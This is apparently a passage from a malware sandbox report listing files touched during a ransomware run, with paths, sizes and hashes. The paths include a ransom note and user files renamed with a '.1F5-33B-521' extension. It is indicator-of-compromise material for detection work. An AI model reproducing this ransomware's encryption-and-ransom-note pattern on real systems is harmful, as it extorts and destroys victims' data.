62f718bc7ae85f13c8eb9e0b77cd5e3ecb42d81c7bfb8c9f5a1f109c0d443e30f43d57fcba29fbe087e9ad38ae9aac9c38f3bb04709f7ff6a65569b9f97279f6

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\ui-strings.js

Filesize
18KB

MD5
0aa708ddc3da5b77f18b0429b477799a

SHA1
4675a80262daa41919b8b1ef74ac8705aef2726a

SHA256
6bbf6e296d36da482b2dd999e328c36cb96a424829d7e16a19509c7718697295

SHA512
e716c1cef9aaf4d7ad62925ad2aa3aa5b8fb88d71b74c6593c8f301dda8edf113318429e7e50891d0a6188e590753982f03b35f4eceaa70a7251c431689fae62

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-il\ui-strings.js

Filesize
9KB

MD5
1e4cd6ec6f871add1717191fa1744ef5

SHA1
d9af63abbb8081def819f6ac48d0615f68f08eba

SHA256
f16b52ff8ef5d9fc9eaaf350164f471242755388d9afa676d1bf2a2cbdbc799e

SHA512
633aa28a1a1ae228ac7668fd175c486b0957942895cc4302ac8e110775fa44331d9a95675ca02ebc7eafb832ccef4eecf7b257fdb98f8a7fb2a744a7ea024942

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-ma\ui-strings.js

Filesize
11KB

MD5
394ffa96f07ce1f0579e09347486bd7a

SHA1
c6ca808192846104fa4e81878ae40f4bd3245f41

SHA256
f261826e34125dfea4cad064604c8d8faf8994f87ab813bc11874f3e7497211d

SHA512
cba4d6e330c6ec4cb6f280ccc2d74c61ae4a4693c42bba985dacd92c530e1bd854078b0d12a542581430a59f4022149f76beb4cc0b0106fd16042e5d837ea126

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-ae\ui-strings.js.1F5-33B-521

Filesize
15KB

MD5
c1b68edf2563110ecf975e13d0baafce

SHA1
5ac9bc39e179f0dff2ba507fb89d5664a1ce7f62

SHA256
c243208ac4355af98ba0c245b57d72cb278662d5f7512dd0475f0aed28b0d009

SHA512
89e34c8001d6c67e184e408d75d2198d2264468a543de0d59c1cab46402eeef93b0efca3a788ada6f48bd70c3c18a3fb80517c6a3baa18e635882bfc6cfa2472

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-ma\ui-strings.js

Filesize
17KB

MD5
84d4abe49d4008e1445961cdf84a5b1c

SHA1
4d0ce2d850c1ea50392d4d736399ec53502c1c2d

SHA256
ac779328c590353b40b191160e980f2075d50b69a7b7e8ea8c9ef7dc9f0b921d

SHA512
a415fd11e23ba5350d7f62ad27dae6c7b56716c313a58c66392b95d9be0f32caaf0dd0f28e6f04bde0be27f83a482ae65385c45067e63113ecb3a60087532504

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\ui-strings.js

Filesize
15KB

MD5
7311f057bf788dec797bf78da58fd548

SHA1
44cd6f02664619c152171df22d81dd6ed4eb3fc7

SHA256
c7fb1376b4d9ceb6c612afbfc7b0741d8f68c73f8f6277847d1bc2afc1a7d4fa

SHA512
b1f4d1b1a30c5dc9ac3920249623c517ff2ba67f4f62bbef1b165181fd27d2d90d7d03c6ce6041074961b1e21e5807ba74dc0e6a757a36db9914b298160c47ba

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-ma\ui-strings.js

Filesize
18KB

MD5
f69132aed8f726db181534e7a302dd1c

SHA1
1dcee45f6e3a3476b1dfcbe4cf55edc48ad40632

SHA256
f263435bc955b4818528b58469149bd33901e323e7a50e41355e735601c2ddca

SHA512
3215c267aef9eda11dbc430847c6c25fb8e9ca1187070c0a0a31e3d072f8a081f6a0a9a6b61fdab17ade903b2e34c87ae8d1984243110b17edacbcfa0ebb6d42

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\ui-strings.js

Filesize
23KB

MD5
e00ea9e68b2fbab015619174da9fa6e7

SHA1
873ebc58e10cd1ab68e37e8a98359982c68639ef

SHA256
c10ab84e35619e8ab26772c18f5693b13bdcee03c267886ee84f398019011bb0

SHA512
902fc30f2a7eb4b22e53bda73062213384bea23f7909d2745d471ff742ce5d9f103998cdd15e4a50f2f4b266717eba81d7a0add33377073c938e6166c1ac2438

Download Submit
C:\Program Files\7-Zip\Lang\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT

Filesize
1KB

MD5
2f0b27c62eb3e64fc1ee55ebeb78ef62

SHA1
690c911f85f6751796bbaf5d864784722d659d81

SHA256
2cac54920605657ecbf2730cbddbdbf1149b40407c809d85ceb8bd4f5da9814f

SHA512
ffca63c9101d1b3ac5a655dcf98220f562d57f1a80221a8044f1afd648b7c4a278530c611b365b3b5b9b6cfcb3595817b1f8665b0d674f2a20bd2d96369e6ffe

Download Submit
C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties

Filesize
7KB

MD5
8a4cba603fd2963e12d517e8216e9b67

SHA1
f8b0de12698739b5129b09ebdc195678bec2b2ea

SHA256
e208a0c9294b6f7404a67645d849adff027f2845446a3f9bf0b3816432446b4d

SHA512
0c9ea757b0908ed438902f8852165b007a0d3a20205519f44dedf773c4faab1e965f35cd8732ece5c614c6c966468d0ecf539f53ac3d0c923aa3769867bf91b4

Download Submit
C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html

Filesize
7KB

MD5
c9067ff76c2af1369a3fb6d24b0a9869

SHA1
a2809d55b778fe7c9b8ce058c6340d48855a2085

SHA256
a1fd77887daae81823bfed205d71822530b29a3d4b4629465c4521dc95750f9c

SHA512
6d3551c529f1a962bae9085733cb31c3bcea018f4e700b2da4e319c5f59d10b0dc622a2519b1c9a809142854eb577bd08997aae6b88e1a26320e2ff1ec908938

Download Submit
C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\license.html

Filesize
10KB

MD5
2ec98db3703c888b74f4411fa86f80fe

SHA1
22cefdb4f5ff7301138e35d2a405fdf8dbaf9d89

SHA256
b3eb6603ae3d3226a23c0c32e4fc868f789a8273407bac7042fe041aa11cfd40

SHA512
4feb759d4025e508b8ce7bbe13994b75daabbd4cde649bd61d9c096813a1eadc3ef78e6f5f8150c3ab0743e39116d998126f56e7a95b8b50797aa1b3a512f62a

Download Submit
C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\license.html

Filesize
10KB

MD5
8ae45256326f3f42697cade0d3ac67f3

SHA1
253fcb58ca557b7fa56169d01c9ee74501b45337

SHA256
9da97dee417ce71862dd6e2f8b3f13167c27023f08f25b35b8926e7e8cdc1e0c

SHA512
d9c38ccad8b67c1aa75028953b91814180132c22ce69f524e385e8a6dba25721a8fe155a65b115554f210c7506aa2a412146e9316d2993bc291ed50a016dbd37

Download Submit
C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html

Filesize
10KB

MD5
5fdc9a7880fe83c63f119db98c8a1901

SHA1
f56b7bfdb1d56a561d69a1f30348ff39d0b0ff3d

SHA256
fc0c87e8482e7dae409dbc5e8b877d824c756965357f3f8db894d0e449b9fea3

SHA512
e4cb70fbc5e1d336d86e02f2ab5378305323d4c0a86b505d108344727b87952df44c7d6a6ed0feaa368e03450e318c60451e18b0f5035058b2ad52562589e5bd

Download Submit
C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html

Filesize
13KB

MD5
c1923d2f36521ebbfcf8a1898efcabbc

SHA1
a844ee898586e1464176c79670b486094d553238

SHA256
6c84239186e6d491b6e004ea8dde34be1e8c1016957d61c0f5bcfa9902d5e707

SHA512
d78f1772f02422bc3d105e98b301182c09d1e5601c55dcb232b869ae8a310d6392dfaeb9843fd99bfa25b51b3133a8e5c079924f5b3c5224339bd354ea105e44

Download Submit
C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe

Filesize
4.1MB

MD5
b9d41ae0e3d9d4520cf1652e145e50db

SHA1
6870d16f379502860a6720751eb5fb24e55be961

SHA256
184c891f363252760f4b1f2399b7b70a17c31c39382981dd1c28ba702a360f2d

SHA512
2dc2b0ce56f98cc59a6cf029f0201ed972074abe2edee514c6468eda2eef32bc25be5a658126e7e9f6862ea01ca9c52bf832f5426bfc03bae48d8f4e3b8a0d1a

Download Submit
C:\Program Files\Microsoft Office\root\Office16\1033\PREVIEWTEMPLATE2.POTX

Filesize
292KB

MD5
b7f5333c91d1c11479071d2fef855d2a

SHA1
0431b383beed1a9ad052046e3b1d4438ce5bf4f5

SHA256
fdc9c5eb8445da5017882dc0c6583e04920bbef8fe69871ca525345f81b8953e

SHA512
a6777c38b0954911578258bc9f4dbaa4c76543f13fca82e97142560898e874eb7d795baa35ae5f42b83c4089020fe7f4ce0c9695a29bee427d276b43e4b41537

Download Submit
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\osmdp64.msi

Filesize
2.4MB

MD5
38cdea0fdc27016b163544b9ccea4f94

SHA1
26e38848bdbf7bbc936d4902a78ddf66b45d27b4

SHA256
b5645209d1f0c5590303c5b59c19dbc70787912e5be200b08a29760136863702

SHA512
b8ded7b296ac139bc6312007ec05097273d7ab8f9eb1d00bc07c6e75648d198d274b83575214cebfde612e327cb361c522f515a622601e236bcf06e146c6e2fb

Download Submit
C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\osmclienticon.exe

Filesize
62KB

MD5
a7cc7dcca02ebcd584930b5e1c77a98d

SHA1
6ff27a387cb084f4996ce165ed8b202f458b9a07

SHA256
b2407e7b747b54a93812c9e44c4478e544f4a0aae176bc738aa07a2a4f6fb51a

SHA512
e4a6a0d1277c26f377b2dae748488b9c75872de559ffc58f96bd69866e7a7550acea502a14a24ab22647e618829e6b88f197653a0b731240144d5e382380a522

Download Submit
C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-1000-0000000FF1CE}\misc.exe

Filesize
1015KB

MD5
741203494c5159993c17609315029179

SHA1
e3d6151ae0b39db4178cc38667862f208574e366

SHA256
ee2089176ee163ff3145ca2fda6f443ccfde748c2904b7d49460c9c737bf5863

SHA512
01e4e90802b1b1c9e5ede76ac859d7c6b4f609016b2d359a678b362e5479f1b7d67c071604660d1cf06e38ca27c6dd1c74ec82b7d1061a22c392aef48264a5bf

Download Submit
C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo

Filesize
609KB

MD5
06bf7e3d3b576d9d85106bad46359e63

SHA1
720e48d9cc95481d27a0b1446e694aee74c7ba82

SHA256
a04221829012c58e06a2facf357f41f2ee5a517f1945d2219cbd597a50ac2bc1

SHA512
2661f7a4a6abfac1f03583ae8db18f45801e91e8f84223db6e595680f04a3abe252dc1050448fbbe21664ed76e24c1c7ba715b3b1b094affce57c2d4bacb933e

Download Submit
C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo

Filesize
610KB

MD5
24f604a35edc563d29c7f426d5172ecf

SHA1
3ac10aa6278ea1bd4d559caa7f70a395717485a9

SHA256
68d253cb2f05f26974d78bebbf24c153a068ed673db6b91879d52693f01661cc

SHA512
e5622d0bf43dbaa8384ce7e57ffd3dc4e482577b038399426db1bd4c68a33bf144fe4624c2b555538704205c996d8ac6099c403d4d22e14b4db3f030d9e3996e

Download Submit
C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\vlc.mo

Filesize
571KB

MD5
892c4482662ac7529c1fd5e0223c6181

SHA1
f12472fd9b357005d66c42a28d7ba266f308f2bf

SHA256
ca9e475b4b472ec5cc2d799edb0b2557493b9b328ec4c3bd8f8f7a0d4986356f

SHA512
7626dcd27f3506b3330b56d2f0c816ef6eef346e004a9548924da9243a55fe3119e254090d31b860801d120a5da6dfcf5932ea04dafb1511dc2d376cb756ab35

Download Submit
C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo

Filesize
600KB

MD5
bb0b5afbe92419aeddba5ba39b885e33

SHA1
05ee44f05778b197252dc4aa132d10b39bf1ad36

SHA256
be7a6b9c7db90d1ebfcd1964b289363988e4e70085f1b1a1ea0393118154323e

SHA512
070eb22a5128ac42dfa2e85d1abcd7931e56a30eaea8652df3b9bf0a48580d520e21a63f0877d533ef1cbb3c257538fb02e06c30de9f061a2b94b097652b266d

Download Submit
C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\vlc.mo

Filesize
771KB

MD5
8eef5618bcec41ab3f55e406f95f3df5

SHA1
0a4322536c0635d1e1d1a7494fddf51a7819477f

SHA256
0c0e43a67a0aecd6b8c68cbcd31f9a12e3291e7784abe6fec1267e15b27def23

SHA512
eaab0703a2f76dbd12e13bfae4cdd735c8b719b8766aef245c545352f88d44c84a31f63b26645b6eb9632b74829208d662dd93fdb1155e31685843927d1ae350

Download Submit
C:\Users\Admin\AppData\Local\Comms\UnistoreDB\USSres00002.jrs

Filesize
3.0MB

MD5
ef41880dd6c4ee97ff4646127e3f7bcd

SHA1
a767708ecbb489b723435d44bd4a093c5aa54881

SHA256
fafbbfa20f2993d0dbed94ccbfb0710dd91ac7ab0edff71247443a55707481a3

SHA512
2a16a4ce2fbd17dbd0f585c8c06fe8bd1847f863b1647d661c7e9c97b6197240dbb8e55a5b9b9924ab07837130e8c11e443afe3ced6a868228afe23b05f1320f

Download Submit
C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\settings.dat

Filesize
9KB

MD5
2566202b2810bede4d0a92f8863ccd67

SHA1
952e31e5d8584b880bca643d8c9521c22b1a4cfc

SHA256
88fc7605ad4c3641d062f54146811c6aca2764599848638f03c0ff1b4d9f70d4

SHA512
b98281564c987d0273bdc2b2ce5f2da3505607f271c1e7481c41067247cc62aa45ca6b2b13765862fdd9391e030b59d457846e6a14b9434c6a9cded23e05b278

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\settings.dat.1F5-33B-521

Filesize
9KB

MD5
19d2f90165777f2b030acf8b1684c4f9

SHA1
8c509433bd239f36434bb8c2f5bbed8cdb93bbb8

SHA256
61b4ee73899aa603d82c249a9b6aa2f7ed369262df3ab2bbfd1bb5970afa841a

SHA512
d8c7ec6c8ae99f011e850671cc17dd5ed17e5130f8ff110513724ac3f2a46e4ddb0e26178c2a71a8a488b5eaf43d31d98d4a84aeb2d80bb589b326016a6d8ddd

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\settings.dat

Filesize
9KB

MD5
0aa58da0edb7aafa1f5d60ecea74c6ec

SHA1
37bf0ce3d1f01b389a0f7c6d1faf0be200043fc9

SHA256
389ca0744bdd41c1af6faf78256d0ee01b797de17467eb4812516cf3a0a7d92e

SHA512
131c2cdb3011fd9e266e1d98b1a753ac21d5e48739386bb0f44f4c9cd5563d450629e914c0be6dd09c8ed02e6fdbf690a158506f8d8d73287a8b479f5f60f6e1

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Settings\settings.dat.1F5-33B-521

Filesize
9KB

MD5
95413b495a807b4ae605b65f677ca171

SHA1
a88e407050d431cdcd6fcae96f916c61e073a61e

SHA256
1ade0b3c54846ddbe45b97e6bc41b61b6675d956d423ef87cec17e14605eb509

SHA512
6c4c3d08ab0e158bdc111e65dcac53c56b8b40add8e55a009c4b743bc6d3b956b78f1aa6e4ba9bbd4d0edfc012d258b682357f0ffc49775e3c0b072531b10f73

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{0A6AC72E-ED8C-C16F-38B6-05831557CF24}

Filesize
37KB

MD5
4c9a706388968a7211f4c7fe2fa0eb29

SHA1
75607a67bd3696059fd6988d5e8abb862a37458e

SHA256
50e66ea8ccb869622c36d282b3761c14d8a1df0a68773a09a569aa9ea6bb5d08

SHA512
3e743caa6f8c0e72ec5d6d15bfbb646dfdf8ad7caaa21ddf3a5a4d194115ff87709e29b5885be1509ad85e427091e5d4edfdda5aa34fd801d0cd9531a6f1c9ab

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{51325390-AE6A-68FC-A315-0950CC83A166}

Filesize
37KB

MD5
a0deb96d49c41a489ed86a96f30843ad

SHA1
8622cba0d1c0415d81bb5944eb4404823f7133d8

SHA256
b9d868fd0e3d003e15b558c630ecc7d7f487a663272c9ab2d2fa3166a5d76fd7

SHA512
1399663d033a63bc7547300dda061a3a60fd784b99a3cba00b75b4e74b822d311f4a427a898cdb99c0bd18d3b30f743872a474776f92278dfb5bebbdd0fd1968

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_msoev_exe_15

Filesize
37KB

MD5
4f8e3739b11f6c6ce51a15ea4ec44dad

SHA1
44a821f53539658f2dd7897ba9fee4a76061096e

SHA256
e583d1875888d2085f49c42605aace44d891b03c74da910d8bfe708a6fd42ac0

SHA512
c6835cb1d765acf5e1cc1e4aa6489128427e2bfefc6199d36af07156271fd5f8accef7ae0d0a2d004189141c56c919171b3dd7527c50231a3c4eb09ca24ed220

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_ControlPanel.1F5-33B-521

Filesize
37KB

MD5
b287a2109655631f79796cb72467639c

SHA1
3f1530911f599e322345694d9475f70c2b71c483

SHA256
76e58c0cc605f9e7cb37ee339539662ac933c1f9f085e43fb121c6c20ed2d62c

SHA512
2987f542045530ff973e7eee093eb558e82337b097bd4fe42c98876b5721672ad1e881dd56af3a78ebbc487761e366d8c56cfc7e5031c3850c4e31ec390ad22a

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Shell_RunDialog

Filesize
37KB

MD5
9f5c937b4a38c2ba1291d5e8af2fe710

SHA1
134d9c9c1fe68438ab68661e9c577c4aa1ff053d

SHA256
f3efbb2103dafc2498aac77ac46cdcca6133882c430523a1b2958a10687f43f6

SHA512
299048e0e08190bc433fe37dd04f5b5335e078e51ef4bfb6b3d88e8b8b44598e5265250e769349cb5043e7f9c502ef99063fa2b35268e9aa16c4e254bf456dea

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_MdSched_exe

Filesize
37KB

MD5
e7ee76a8712b4f6f2e6832308570e45c

SHA1
76fba4cf52387e9a8a0f194865b0ad34006a1596

SHA256
ab89155acc8c7f345d8211e6cff2d26cc97bf5c9ebaceec4ab106400cf864e28

SHA512
9d5c9012378736c460289b7c360bf95387aca93f9e7e7864ae480f19e851fbf7735ba57a9f85353c178478740bd5f8d174a398fb8a702298a94eeae52ecc6f77

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_PowerShell_ISE_exe

Filesize
37KB

MD5
352a62045be4bef312fc061338fc630a

SHA1
4d9996b335409fb7f09238938665981c9a27a308

SHA256
66abad3ecf6a8a68b771bead42453044629fa8658df291083cb1949570cd7539

SHA512
9a8b0849ca055446820e96f91a44874571d796a3d0609183551ac873cc19641941379f81e48c9d18c8b392e74319b55e92fa81c93b616f2d5c5cec9bf498bbcb

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_cleanmgr_exe

Filesize
37KB

MD5
eda5849a0bb35a74a36abda959a6d444

SHA1
69bbc8afdf99e730bd91271a6ea17027429a15d7

SHA256
0107f4cef60255799a0fce5d9bd8bbde6eaae695e5fd32a36980f1a0c6f74a71

SHA512
769989f49ca6f8844bfbb5d310933380798d322f001c358431fceade9480d5482f843e151715c797fe63fcebdcd8ced01df15f73180a8227cf0cc3061ccc7868

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_quickassist_exe

Filesize
37KB

MD5
63c8dbc8ab9e7c61bd88de214eea3c90

SHA1
e3a41f0e36a3b291c20e7d20e65e339ce63c5920

SHA256
07b554f38459b3a5c1ca9e5ac060e388c128ea788b969abec3c4c907f8a65b28

SHA512
03051e12b7f9938c5418f7873933a1257e2892e2b3fde2764ff852f2494813315c92c1a5df2659c7bda32565b65e96dc820e80c13e98c43d4e1b29e0a468e7c8

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_services_msc

Filesize
37KB

MD5
e81fdd9f18214903fa211c8b4a49cf6e

SHA1
757c96421b498139ef82ac8c3903805030422bd9

SHA256
4f600839babe153570c9b440ce86ba341fe82987a511de60dafb3a53893f32c6

SHA512
108e4151fb60cc838a4122fc0c088c99e718a83b6be1a7f8e7925f1b0a9868341e0d5180814153be382f108426481e73b75fc3dbbb9a737b32bd41a0eb5ad304

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_7-Zip_7zFM_exe

Filesize
37KB

MD5
8b0f49c4f9e84740cbfca1b8b9f98e21

SHA1
a880c7fea0d0c38a1011205e762c480dcfbfe771

SHA256
6fab35e6ec3db96f8430ade411387291c8aff96cc9bd2f6203dffe72cb4d3fd5

SHA512
1406091e3e6ad093d3df7d044b832c0e3df8030b6680ab3c64e089c2850ddf857513c518adfa6b5fa5c6a565c9a7d8180a76bcad4a9e6fbfb958c0e10424d301

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_PowerShell_ISE_exe

Filesize
37KB

MD5
2a234eb2cfcf3effeee8da6272b8f3d1

SHA1
bfe440e165fe997a8b41ce8a92f4dc84ccf123fd

SHA256
e77df774abb091b6caf7251366eee6f3909671ab69d7e0f6221088748fd46dda

SHA512
27bb258e58cfa46ee8ab7aa25541de1433769259997de6ae437376af2edaba4091686d340f9014a15dd71760b4429bf888ee9175d64cb601e90bdba7fdbeb8c5

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{1ecb7703-fde7-4466-9b2d-bf51c3b823b7}\Apps.index

Filesize
1.0MB

MD5
f30cac712e68b0b3555697998e4383e6

SHA1
b88e9f07053e2c50973dfc77a2fd55ca744903e2

SHA256
02fb8b376278ca6dc17e1b86de715acbbb23253d40f27fc3223c9b89772a7ca9

SHA512
485d37fb9599e10d51f577f80b1a60fd3223ef15416287215fbf61884ffddf68dca593c3104992b8e63f2f735771fc751d70a249984164b8c672ceb68fc8f403

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5c9fa363-44d8-4959-84e2-b8d08833f3c4}\Apps.index

Filesize
1.0MB

MD5
68efb95aa64867825c6445669b5d28d2

SHA1
72155f1370189442707742f4ee2f9fddf3eebcf1

SHA256
7ee2ab3df434b21467afd9a504d83c1db10a203029b3eefadc82dffa246a1df7

SHA512
2c3b3db6b63818c0641248f3ee9bbb07275105e4b951016c0108a53bd3261910360021cb3f7dd9c3f5b49716ac9807ed634b14b409ad8d085911426ef6d636f8

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133328614093130371.txt

Filesize
78KB

MD5
276224e017447ca899c3df7de37e151f

SHA1
ed89b10d049362e9ea67433762656ef1027f1334

SHA256
de7868584dfbd9e807067d439122395a2de87cb164558e438a4e2a3b40644a1f

SHA512
8b1a73060f37d6422cc877da11ccb3cb09886b6593675a7cc861f79bfe63b41d88b8de010194a4b0ec33be8aa5a86a55dd80e64ef175cf94b11c71fb72321682

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133328617602860854.txt

Filesize
48KB

MD5
41f98dbf571204e2c72eec3d74d87fb0

SHA1
a269e7cb05fe831ae27fb09db1d99a5f99f3f72f

SHA256
0f0143a92944809d22ae56e5ba6945ed0faa3c2820b633df7ed6e14ddbf9646c

SHA512
07b3daa4cbc868fa99604e81df23625596066cddb45c1526a2cd22fbd5c450ef4f356622512e8431fbfb635f31d97b418f6efbd04359eca693370546135a441b

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133328626551628171.txt

Filesize
65KB

MD5
f50f3608e2b3afc3ffa9686fa3af1981

SHA1
de81383d3a0313d18e94dd9bb26c21b7ef2cc99f

SHA256
9ad131ab8f6a7d18f460e1acce450afbf00afef52b5e269abe98bfcaa6b21a8e

SHA512
64c52be3f632e36fae10dc3a4dc38d3bb45047b2ab8785cf2a23976d13f16f2152e34d4c804e9a99b5817577f2edb131823cd2d1da41ac9e91e2fa78625b72fa

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133328667524134160.txt

Filesize
76KB

MD5
c503a4893c367a9d30aa88772fcb6d1c

SHA1
51af588c643eae1dffccce2f59c1bcecc86d5e21

SHA256
f65b6d3803d47e4656dd9d5168ca281bc80234329ce7008247104dfcf1c0c6a1

SHA512
645197053114009a59352bb40d93e5412d99b09947e04ffe07cef42eb1ce1fca2b4503d67e45a26c232ca94070338ca8bc0108e3029dff6a8bb46f7c5baf6105

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Settings\settings.dat

Filesize
9KB

MD5
5c1dc7f504fcd496ff820cbeb441fc5c

SHA1
5907c37859b38e7e560d5d2c034ca7a20dc0d3f9

SHA256
8f1f150a1f7077da022da214d7819e1220fe525b364b565fb25c6f1a1e7f1532

SHA512
5cbf52a5b4968bae6aff7c7adea8ba14b86c43f3236095ed86cc239a6ef818e6d16e261bcd57a647172b54bcdb53eb05d1bbcaef726cdf0579f62654649b1143

Download Submit
C:\Users\Admin\AppData\Local\Temp\wct31C9.tmp

Filesize
64KB

MD5
314b85ff7bea4e81b10f4ad42702af40

SHA1
9114e3587bfbb5a979a0489054c04116d5740bbf

SHA256
6cfe13071b10acdeef25d9cdc856265cb1773a0245781b3fa0db898e835d4ab3

SHA512
f1ecfc595b4030cf26a0b1bfa6f13277630b81b3e5fd5a11b946ed5aac6150204fff0c745c641611693c707b214a050ad732a814e84a940f720b15b4b5191575

Download Submit
C:\Users\Admin\AppData\Local\Temp\~temp001.bat

Filesize
10KB

MD5
0d0bd9b3d068d303baace9d289906182

SHA1
15e9b273494cd57a8e5b12b8f821019a49bcf983

SHA256
779735a7b4cab272dde5f971d743d7ac9c6925b437dba5f6478757f696958d1e

SHA512
76d96eb2aec728acb8f401532964346f82c4e0cf250dbac25485839e75fdab790be877fdf2f734c3acff8aa4e830efb4960cddf7490e75749ee09afeaa629325

Download Submit
C:\Users\Admin\Desktop\CloseSkip.AAC.1F5-33B-521

Filesize
1000KB

MD5
210c97fd639caf3c69e8049a36c33fc0

SHA1
981d73eefbf8ab0a51b10a9677dd5217b451b6fd

SHA256
de28348b01227170c4c6ef9aba39ef85f13a533bf263ecf3dfd2ceb50fd143e3

SHA512
5cca7f3e424adf11f0242f9f6e58fa38076546271a18b437430c7f53567f90d48eb66dacc3945f31305eec87f863f1a6a6ea75dd631027e3491adbc320e0a5f1

Download Submit
C:\Users\Admin\Desktop\ConfirmMerge.css.1F5-33B-521

Filesize
1.1MB

MD5
237f6617a262fa4a538b89a935dd1a0f

SHA1
c713637a1989ffaea6245603aa908d42482f398e

SHA256
ff131f7a05077732ea9dcca91c9bbc9621aca99ac12920fb20839972738307a9

SHA512
